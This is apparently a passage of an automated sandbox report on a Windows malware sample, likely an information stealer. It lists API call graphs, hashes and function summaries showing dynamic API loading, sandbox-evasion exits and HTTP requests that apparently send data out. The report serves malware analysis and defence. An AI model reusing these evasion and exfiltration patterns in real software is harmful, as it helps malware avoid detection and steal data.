26902->26905 26903->26902 26904->26905 26906 42051f 26905->26906 26907 427177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26905->26907 26908 401530 26906->26908 26907->26906 27217 401610 26908->27217 26910 40153b 26911 401555 lstrcpy 26910->26911 26912 40155d 26910->26912 26911->26912 26913 401577 lstrcpy 26912->26913 26914 40157f 26912->26914 26913->26914 26915 401599 lstrcpy 26914->26915 26917 4015a1 26914->26917 26915->26917 26916 401605 26919 41f1b0 lstrlen 26916->26919 26917->26916 26918 4015fd lstrcpy 26917->26918 26918->26916 26920 41f1e4 26919->26920 26921 41f1f7 lstrlen 26920->26921 26922 41f1eb lstrcpy 26920->26922 26923 41f208 26921->26923 26922->26921 26924 41f21b lstrlen 26923->26924 26925 41f20f lstrcpy 26923->26925 26926 41f22c 26924->26926 26925->26924 26927 41f233 lstrcpy 26926->26927 26928 41f23f 26926->26928 26927->26928 26929 41f258 lstrcpy 26928->26929 26930 41f264 26928->26930 26929->26930 26931 41f286 lstrcpy 26930->26931 26932 41f292 26930->26932 26931->26932 26933 41f2ba lstrcpy 26932->26933 26934 41f2c6 26932->26934 26933->26934 26935 41f2ea lstrcpy 26934->26935 26986 41f300 26934->26986 26935->26986 26936 41f30c lstrlen 26936->26986 26937 41f4b9 lstrcpy 26937->26986 26938 41f3a1 lstrcpy 26938->26986 26939 41f3c5 lstrcpy 26939->26986 26940 41f4e8 lstrcpy 27000 41f4f0 26940->27000 26941 41f479 lstrcpy 26941->26986 26942 41f59c lstrcpy 26942->27000 26943 41f70f StrCmpCA 26948 41fe8e 26943->26948 26943->26986 26944 41f616 StrCmpCA 26944->26943 26944->27000 26945 41fa29 StrCmpCA 26957 41fe2b 26945->26957 26945->26986 26946 41f73e lstrlen 26946->26986 26947 41fd4d StrCmpCA 26951 41fd60 Sleep 26947->26951 26962 41fd75 26947->26962 26949 41fead lstrlen 26948->26949 26950 41fea5 lstrcpy 26948->26950 26955 41fec7 26949->26955 26950->26949 26951->26986 26952 41fa58 lstrlen 26952->26986 26953 41f64a lstrcpy 26953->27000 26954 401530 8 API calls 26954->27000 26960 41fee7 lstrlen 26955->26960 26965 41fedf lstrcpy 26955->26965 26956 41fe4a lstrlen 26964 41fe64 26956->26964 26957->26956 26958 41fe42 lstrcpy 26957->26958 26958->26956 26959 41f89e lstrcpy 26959->26986 26968 41ff01 26960->26968 26961 41fd94 lstrlen 26975 41fdae 26961->26975 26962->26961 26966 41fd8c lstrcpy 26962->26966 26963 41f76f lstrcpy 26963->26986 26970 41fdce lstrlen 26964->26970 26973 41fe7c lstrcpy 26964->26973 26965->26960 26966->26961 26967 41fbb8 lstrcpy 26967->26986 26976 41ff21 26968->26976 26984 41ff19 lstrcpy 26968->26984 26969 41fa89 lstrcpy 26969->26986 26983 41fde8 26970->26983 26972 41f8cd lstrcpy 26972->27000 26973->26970 26974 41f791 lstrcpy 26974->26986 26975->26970 26979 41fdc6 lstrcpy 26975->26979 26985 401610 4 API calls 26976->26985 26977 41faab lstrcpy 26977->26986 26978 41f698 lstrcpy 26978->27000 26979->26970 26980 41ee90 28 API calls 26980->26986 26981 401530 8 API calls 26981->26986 26982 41fbe7 lstrcpy 26982->27000 26987 41fe08 26983->26987 26989 41fe00 lstrcpy 26983->26989 26984->26976 27003 41fe13 26985->27003 26986->26936 26986->26937 26986->26938 26986->26939 26986->26940 26986->26941 26986->26943 26986->26945 26986->26946 26986->26947 26986->26952 26986->26959 26986->26963 26986->26967 26986->26969 26986->26972 26986->26974 26986->26977 26986->26980 26986->26981 26986->26982 26991 41f7e2 lstrcpy 26986->26991 26994 41fafc lstrcpy 26986->26994 26986->27000 26990 401610 4 API calls 26987->26990 26988 41efb0 35 API calls 26988->27000 26989->26987 26990->27003 26991->26986 26992 41f924 lstrcpy 26992->27000 26993 41f99e StrCmpCA 26993->26945 26993->27000 26994->26986 26995 41fc3e lstrcpy 26995->27000 26996 41fcb8 StrCmpCA 26996->26947 26996->27000 26997 41f9cb lstrcpy 26997->27000 26998 41fce9 lstrcpy 26998->27000 26999 41ee90 28 API calls 26999->27000 27000->26942 27000->26944 27000->26945 27000->26947 27000->26953 27000->26954 27000->26978 27000->26986 27000->26988 27000->26992 27000->26993 27000->26995 27000->26996 27000->26997 27000->26998 27000->26999 27001 41fa19 lstrcpy 27000->27001 27002 41fd3a lstrcpy 27000->27002 27001->27000 27002->27000 27003->26027 27005 422785 27004->27005 27006 42278c GetVolumeInformationA 27004->27006 27005->27006 27007 4227ec GetProcessHeap RtlAllocateHeap 27006->27007 27009 422822 27007->27009 27010 422826 wsprintfA 27007->27010 27227 4271e0 27009->27227 27010->27009 27014 404c70 27013->27014 27015 404c85 27014->27015 27016 404c7d lstrcpy 27014->27016 27231 404bc0 27015->27231 27016->27015 27018 404c90 27019 404ccc lstrcpy 27018->27019 27020 404cd8 27018->27020 27019->27020 27021 404cff lstrcpy 27020->27021 27022 404d0b 27020->27022 27021->27022 27023 404d2f lstrcpy 27022->27023 27024 404d3b 27022->27024 27023->27024 27025 404d6d lstrcpy 27024->27025 27026 404d79 27024->27026 27025->27026 27027 404da0 lstrcpy 27026->27027 27028 404dac InternetOpenA StrCmpCA 27026->27028 27027->27028 27029 404de0 27028->27029 27030 4054b8 InternetCloseHandle CryptStringToBinaryA 27029->27030 27235 423e70 27029->27235 27031 4054e8 LocalAlloc 27030->27031 27047 4055d8 27030->27047 27033 4054ff CryptStringToBinaryA 27031->27033 27031->27047 27034 405517 LocalFree 27033->27034 27035 405529 lstrlen 27033->27035 27034->27047 27036 40553d 27035->27036 27038 405563 lstrlen 27036->27038 27039 405557 lstrcpy 27036->27039 27037 404dfa 27040 404e23 lstrcpy lstrcat 27037->27040 27041 404e38 27037->27041 27043 40557d 27038->27043 27039->27038 27040->27041 27042 404e5a lstrcpy 27041->27042 27045 404e62 27041->27045 27042->27045 27044 40558f lstrcpy lstrcat 27043->27044 27048 4055a2 27043->27048 27044->27048 27046 404e71 lstrlen 27045->27046 27050 404e89 27046->27050 27047->26056 27049 4055d1 27048->27049 27051 4055c9 lstrcpy 27048->27051 27049->27047 27052 404e95 lstrcpy lstrcat 27050->27052 27053 404eac 27050->27053 27051->27049 27052->27053 27054 404ed5 27053->27054 27055 404ecd lstrcpy 27053->27055 27056 404edc lstrlen 27054->27056 27055->27054 27057 404ef2 27056->27057 27058 404efe lstrcpy lstrcat 27057->27058 27059 404f15 27057->27059 27058->27059 27060 404f36 lstrcpy 27059->27060 27061 404f3e 27059->27061 27060->27061 27062 404f65 lstrcpy lstrcat 27061->27062 27063 404f7b 27061->27063 27062->27063 27064 404fa4 27063->27064 27065 404f9c lstrcpy 27063->27065 27066 404fab lstrlen 27064->27066 27065->27064 27067 404fc1 27066->27067 27068 404fcd lstrcpy lstrcat 27067->27068 27069 404fe4 27067->27069 27068->27069 27070 40500d 27069->27070 27071 405005 lstrcpy 27069->27071 27072 405014 lstrlen 27070->27072 27071->27070 27073 40502a 27072->27073 27074 405036 lstrcpy lstrcat 27073->27074 27075 40504d 27073->27075 27074->27075 27076 405079 27075->27076 27077 405071 lstrcpy 27075->27077 27078 405080 lstrlen 27076->27078 27077->27076 27079 40509b 27078->27079 27080 4050ac lstrcpy lstrcat 27079->27080 27081 4050bc 27079->27081 27080->27081 27082 4050da lstrcpy lstrcat 27081->27082 27083 4050ed 27081->27083 27082->27083 27084 40510b lstrcpy 27083->27084 27085 405113 27083->27085 27084->27085 27086 405121 InternetConnectA 27085->27086 27086->27030 27087 405150 HttpOpenRequestA 27086->27087 27088 4054b1 InternetCloseHandle 27087->27088 27089 40518b 27087->27089 27088->27030 27242 427310 lstrlen 27089->27242 27093 4051a4 27250 4272c0 27093->27250 27096 427280 lstrcpy 27097 4051c0 27096->27097 27098 427310 3 API calls 27097->27098 27099 4051d5 27098->27099 27100 427280 lstrcpy 27099->27100 27101 4051de 27100->27101 27102 427310 3 API calls 27101->27102 27103 4051f4 27102->27103 27104 427280 lstrcpy 27103->27104 27105 4051fd 27104->27105 27106 427310 3 API calls 27105->27106 27107 405213 27106->27107 27108 427280 lstrcpy 27107->27108 27109 40521c 27108->27109 27110 427310 3 API calls 27109->27110 27111 405231 27110->27111 27112 427280 lstrcpy 27111->27112 27113 40523a 27112->27113 27114 4272c0 2 API calls 27113->27114 27115 40524d 27114->27115 27116 427280 lstrcpy 27115->27116 27117 405256 27116->27117 27118 427310 3 API calls 27117->27118 27119 40526b 27118->27119 27120 427280 lstrcpy 27119->27120 27121 405274 27120->27121 27122 427310 3 API calls 27121->27122 27123 405289 27122->27123 27124 427280 lstrcpy 27123->27124 27125 405292 27124->27125 27126 4272c0 2 API calls 27125->27126 27127 4052a5 27126->27127 27128 427280 lstrcpy 27127->27128 27129 4052ae 27128->27129 27130 427310 3 API calls 27129->27130 27131 4052c3 27130->27131 27132 427280 lstrcpy 27131->27132 27133 4052cc 27132->27133 27134 427310 3 API calls 27133->27134 27135 4052e2 27134->27135 27136 427280 lstrcpy 27135->27136 27137 4052eb 27136->27137 27138 427310 3 API calls 27137->27138 27139 405301 27138->27139 27140 427280 lstrcpy 27139->27140 27141 40530a 27140->27141 27142 427310 3 API calls 27141->27142 27143 40531f 27142->27143 27144 427280 lstrcpy 27143->27144 27145 405328 27144->27145 27146 4272c0 2 API calls 27145->27146 27147 40533b 27146->27147 27148 427280 lstrcpy 27147->27148 27149 405344 27148->27149 27150 405370 lstrcpy 27149->27150 27151 40537c 27149->27151 27150->27151 27152 4272c0 2 API calls 27151->27152 27153 40538a 27152->27153 27154 4272c0 2 API calls 27153->27154 27155 405397 27154->27155 27156 427280 lstrcpy 27155->27156 27157 4053a1 27156->27157 27158 4053b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27157->27158 27159 40549c InternetCloseHandle 27158->27159 27163 4053f2 27158->27163 27161 4054ae 27159->27161 27160 4053fd lstrlen 27160->27163 27161->27088 27162 40542e lstrcpy lstrcat 27162->27163 27163->27159 27163->27160 27163->27162 27164 405473 27163->27164 27165 40546b lstrcpy 27163->27165 27166 40547a InternetReadFile 27164->27166 27165->27164 27166->27159 27166->27163 27168 418cc6 ExitProcess 27167->27168 27169 418ccd 27167->27169 27170 418ee2 27169->27170 27171 418d84 StrCmpCA 27169->27171 27172 418da4 StrCmpCA 27169->27172 27173 418d06 lstrlen 27169->27173 27174 418e88 lstrlen 27169->27174 27175 418e6f StrCmpCA 27169->27175 27176 418d30 lstrlen 27169->27176 27177 418e56 StrCmpCA 27169->27177 27178 418d5a lstrlen 27169->27178 27179 418dbd StrCmpCA 27169->27179 27180 418ddd StrCmpCA 27169->27180 27181 418dfd StrCmpCA 27169->27181 27182 418e1d StrCmpCA 27169->27182 27183 418e3d StrCmpCA 27169->27183 27184 418ebb lstrcpy 27169->27184 27170->26058 27171->27169 27172->27169 27173->27169 27174->27169 27175->27169 27176->27169 27177->27169 27178->27169 27179->27169 27180->27169 27181->27169 27182->27169 27183->27169 27184->27169 27185->26064 27186->26066 27187->26072 27188->26074 27189->26080 27190->26082 27191->26088 27192->26092 27193->26098 27194->26100 27195->26104 27196->26118 27197->26122 27198->26121 27199->26117 27200->26121 27201->26137 27202->26123 27203->26127 27204->26128 27205->26134 27206->26139 27207->26141 27208->26148 27209->26154 27210->26176 27211->26179 27212->26178 27213->26174 27214->26178 27215->26188 27218 40161f 27217->27218 27219 40162b lstrcpy 27218->27219 27220 401633 27218->27220 27219->27220 27221 40164d lstrcpy 27220->27221 27222 401655 27220->27222 27221->27222 27223 40166f lstrcpy 27222->27223 27225 401677 27222->27225 27223->27225 27224 401699 27224->26910 27225->27224 27226 401691 lstrcpy 27225->27226 27226->27224 27228 4271e6 27227->27228 27229 422860 27228->27229 27230 4271fc lstrcpy 27228->27230 27229->26053 27230->27229 27232 404bd0 27231->27232 27232->27232 27233 404bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27232->27233 27234 404c41 27233->27234 27234->27018 27236 423e83 27235->27236 27237 423e9f lstrcpy 27236->27237 27238 423eab 27236->27238 27237->27238 27239 423ed5 GetSystemTime 27238->27239 27240 423ecd lstrcpy 27238->27240 27241 423ef3 27239->27241 27240->27239 27241->27037 27243 42732d 27242->27243 27244 40519b 27243->27244 27245 42733d lstrcpy lstrcat 27243->27245 27246 427280 27244->27246 27245->27244 27247 42728c 27246->27247 27248 4272b4 27247->27248 27249 4272ac lstrcpy 27247->27249 27248->27093 27249->27248 27252 4272dc 27250->27252 27251 4051b7 27251->27096 27252->27251 27253 4272ed lstrcpy lstrcat 27252->27253 27253->27251 27283 4231f0 GetSystemInfo wsprintfA 27259 414c77 295 API calls 27267 41e0f9 140 API calls 27298 416b79 138 API calls 27261 408c79 strlen malloc 27289 41f2f8 93 API calls 27299 401b64 162 API calls 27310 40bbf9 90 API calls 27268 422880 10 API calls 27269 424480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 27270 423480 6 API calls 27290 423280 7 API calls 27271 418c88 16 API calls 27300 40b309 98 API calls 27262 422c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27301 429711 9 API calls __setmbcp 27280 424e35 8 API calls 27272 412499 290 API calls 27311 40db99 672 API calls 27312 418615 47 API calls 27273 42749e malloc strlen ctype 27275 4230a0 GetSystemPowerStatus 27284 4229a0 GetCurrentProcess IsWow64Process 27302 414b29 303 API calls 27313 4123a9 298 API calls 27281 423130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27314 41abb2 120 API calls 27288 40f639 144 API calls 27291 4016b9 200 API calls 27306 40bf39 177 API calls

                          Executed Functions

                          Function 00404C50 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00404C7F
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00404CD2
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00404D05
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00404D35
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00404D73
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00404DA6
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404DB6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$InternetOpen
                          • String ID: "$------
                          • API String ID: 2041821634-2370822465
                          • Opcode ID: 6c3c5d335efb11815440e1d7030d8ffe3761fab3276f760a29416e0f67d3dcd2
                          • Instruction ID: afea9254e350e2c83c5ca1416078c05f3deafe074f832828c9fbfb0ea130657c
                          • Opcode Fuzzy Hash: 6c3c5d335efb11815440e1d7030d8ffe3761fab3276f760a29416e0f67d3dcd2
                          • Instruction Fuzzy Hash: D3527C71A006169BDB21EBA5DC89A9F77B9AF44304F14502AF901B7291DB78EC41CFE8
                          Function 00426390 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2125 426390-4263bd GetPEB 2126 4265c3-426623 LoadLibraryA * 5 2125->2126 2127 4263c3-4265be call 4262f0 GetProcAddress * 20 2125->2127 2128 426625-426633 GetProcAddress 2126->2128 2129 426638-42663f 2126->2129 2127->2126 2128->2129 2131 426641-426667 GetProcAddress * 2 2129->2131 2132 42666c-426673 2129->2132 2131->2132 2134 426675-426683 GetProcAddress 2132->2134 2135 426688-42668f 2132->2135 2134->2135 2137 426691-42669f GetProcAddress 2135->2137 2138 4266a4-4266ab 2135->2138 2137->2138 2139 4266d7-4266da 2138->2139 2140 4266ad-4266d2 GetProcAddress * 2 2138->2140 2140->2139
                          APIs
                          • GetProcAddress.KERNEL32(75550000,00FB0828), ref: 004263E9
                          • GetProcAddress.KERNEL32(75550000,00FB0798), ref: 00426402
                          • GetProcAddress.KERNEL32(75550000,00FB06F0), ref: 0042641A
                          • GetProcAddress.KERNEL32(75550000,00FB0720), ref: 00426432
                          • GetProcAddress.KERNEL32(75550000,00FB89A0), ref: 0042644B
                          • GetProcAddress.KERNEL32(75550000,00FA64E0), ref: 00426463
                          • GetProcAddress.KERNEL32(75550000,00FA6420), ref: 0042647B
                          • GetProcAddress.KERNEL32(75550000,00FB0750), ref: 00426494
                          • GetProcAddress.KERNEL32(75550000,00FB0570), ref: 004264AC
                          • GetProcAddress.KERNEL32(75550000,00FB0780), ref: 004264C4
                          • GetProcAddress.KERNEL32(75550000,00FB0840), ref: 004264DD
                          • GetProcAddress.KERNEL32(75550000,00FA62E0), ref: 004264F5
                          • GetProcAddress.KERNEL32(75550000,00FB0588), ref: 0042650D
                          • GetProcAddress.KERNEL32(75550000,00FB05A0), ref: 00426526
                          • GetProcAddress.KERNEL32(75550000,00FA65C0), ref: 0042653E
                          • GetProcAddress.KERNEL32(75550000,00FB0660), ref: 00426556
                          • GetProcAddress.KERNEL32(75550000,00FB0870), ref: 0042656F
                          • GetProcAddress.KERNEL32(75550000,00FA6600), ref: 00426587
                          • GetProcAddress.KERNEL32(75550000,00FB08E8), ref: 0042659F
                          • GetProcAddress.KERNEL32(75550000,00FA64C0), ref: 004265B8
                          • LoadLibraryA.KERNEL32(00FB08A0,?,?,?,00421C03), ref: 004265C9
                          • LoadLibraryA.KERNEL32(00FB0888,?,?,?,00421C03), ref: 004265DB
                          • LoadLibraryA.KERNEL32(00FB0918,?,?,?,00421C03), ref: 004265ED
                          • LoadLibraryA.KERNEL32(00FB08B8,?,?,?,00421C03), ref: 004265FE
                          • LoadLibraryA.KERNEL32(00FB0900,?,?,?,00421C03), ref: 00426610
                          • GetProcAddress.KERNEL32(75670000,00FB08D0), ref: 0042662D
                          • GetProcAddress.KERNEL32(75750000,00FB0858), ref: 00426649
                          • GetProcAddress.KERNEL32(75750000,00FB8CE8), ref: 00426661
                          • GetProcAddress.KERNEL32(76BE0000,00FB8D30), ref: 0042667D
                          • GetProcAddress.KERNEL32(759D0000,00FA6620), ref: 00426699
                          • GetProcAddress.KERNEL32(773F0000,00FB8900), ref: 004266B5
                          • GetProcAddress.KERNEL32(773F0000,NtQueryInformationProcess), ref: 004266CC
                          Strings
                          • NtQueryInformationProcess, xrefs: 004266C1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: 08423d41d42870b35824142912b907ad99356ee077fbccda2de61b0a00986185
                          • Instruction ID: 56f15a9ebe07009b104d3bca99d0accdf766ba62d45a378873afb81fcff78c7b
                          • Opcode Fuzzy Hash: 08423d41d42870b35824142912b907ad99356ee077fbccda2de61b0a00986185
                          • Instruction Fuzzy Hash: 0FA16EB9A117009FD758DF65EE88A6637BBF789744300A51DF94683360DBB4A900DFB0
                          Function 00421BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2141 421bf0-421c0b call 402a90 call 426390 2146 421c1a-421c27 call 402930 2141->2146 2147 421c0d 2141->2147 2151 421c35-421c63 2146->2151 2152 421c29-421c2f lstrcpy 2146->2152 2148 421c10-421c18 2147->2148 2148->2146 2148->2148 2156 421c65-421c67 ExitProcess 2151->2156 2157 421c6d-421c7b GetSystemInfo 2151->2157 2152->2151 2158 421c85-421ca0 call 401030 call 4010c0 GetUserDefaultLangID 2157->2158 2159 421c7d-421c7f ExitProcess 2157->2159 2164 421ca2-421ca9 2158->2164 2165 421cb8-421cca call 422ad0 call 423e10 2158->2165 2164->2165 2166 421cb0-421cb2 ExitProcess 2164->2166 2171 421ce7-421d06 lstrlen call 402930 2165->2171 2172 421ccc-421cde call 422a40 call 423e10 2165->2172 2178 421d23-421d40 lstrlen call 402930 2171->2178 2179 421d08-421d0d 2171->2179 2172->2171 2183 421ce0-421ce1 ExitProcess 2172->2183 2186 421d42-421d44 2178->2186 2187 421d5a-421d7b call 422ad0 lstrlen call 402930 2178->2187 2179->2178 2181 421d0f-421d11 2179->2181 2181->2178 2184 421d13-421d1d lstrcpy lstrcat 2181->2184 2184->2178 2186->2187 2189 421d46-421d54 lstrcpy lstrcat 2186->2189 2193 421d9a-421db4 lstrlen call 402930 2187->2193 2194 421d7d-421d7f 2187->2194 2189->2187 2199 421db6-421db8 2193->2199 2200 421dce-421deb call 422a40 lstrlen call 402930 2193->2200 2194->2193 2195 421d81-421d85 2194->2195 2195->2193 2197 421d87-421d94 lstrcpy lstrcat 2195->2197 2197->2193 2199->2200 2201 421dba-421dc8 lstrcpy lstrcat 2199->2201 2206 421e0a-421e0f 2200->2206 2207 421ded-421def 2200->2207 2201->2200 2209 421e11 call 402a20 2206->2209 2210 421e16-421e22 call 402930 2206->2210 2207->2206 2208 421df1-421df5 2207->2208 2208->2206 2211 421df7-421e04 lstrcpy lstrcat 2208->2211 2209->2210 2215 421e30-421e66 call 402a20 * 5 OpenEventA 2210->2215 2216 421e24-421e26 2210->2216 2211->2206 2228 421e68-421e8a CloseHandle Sleep OpenEventA 2215->2228 2229 421e8c-421ea0 CreateEventA call 421b20 call 41ffd0 2215->2229 2216->2215 2217 421e28-421e2a lstrcpy 2216->2217 2217->2215 2228->2228 2228->2229 2233 421ea5-421eae CloseHandle ExitProcess 2229->2233
                          APIs
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FB0828), ref: 004263E9
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FB0798), ref: 00426402
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FB06F0), ref: 0042641A
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FB0720), ref: 00426432
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FB89A0), ref: 0042644B
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FA64E0), ref: 00426463
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FA6420), ref: 0042647B
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FB0750), ref: 00426494
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FB0570), ref: 004264AC
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FB0780), ref: 004264C4
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FB0840), ref: 004264DD
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FA62E0), ref: 004264F5
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FB0588), ref: 0042650D
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00421C2F
                          • ExitProcess.KERNEL32 ref: 00421C67
                          • GetSystemInfo.KERNEL32(?), ref: 00421C71
                          • ExitProcess.KERNEL32 ref: 00421C7F
                            • Part of subcall function 00401030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00401046
                            • Part of subcall function 00401030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0040104D
                            • Part of subcall function 00401030: ExitProcess.KERNEL32 ref: 00401058
                            • Part of subcall function 004010C0: GlobalMemoryStatusEx.KERNEL32 ref: 004010EA
                            • Part of subcall function 004010C0: ExitProcess.KERNEL32 ref: 00401114
                          • GetUserDefaultLangID.KERNEL32 ref: 00421C8F
                          • ExitProcess.KERNEL32 ref: 00421CB2
                          • ExitProcess.KERNEL32 ref: 00421CE1
                          • lstrlen.KERNEL32(00FB89B0), ref: 00421CEE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00421D15
                          • lstrcat.KERNEL32(00000000,00FB89B0), ref: 00421D1D
                          • lstrlen.KERNEL32(00434B98), ref: 00421D28
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00421D48
                          • lstrcat.KERNEL32(00000000,00434B98), ref: 00421D54
                          • lstrlen.KERNEL32(00000000), ref: 00421D63
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00421D89
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00421D94
                          • lstrlen.KERNEL32(00434B98), ref: 00421D9F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00421DBC
                          • lstrcat.KERNEL32(00000000,00434B98), ref: 00421DC8
                          • lstrlen.KERNEL32(00000000), ref: 00421DD7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00421DF9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00421E04
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
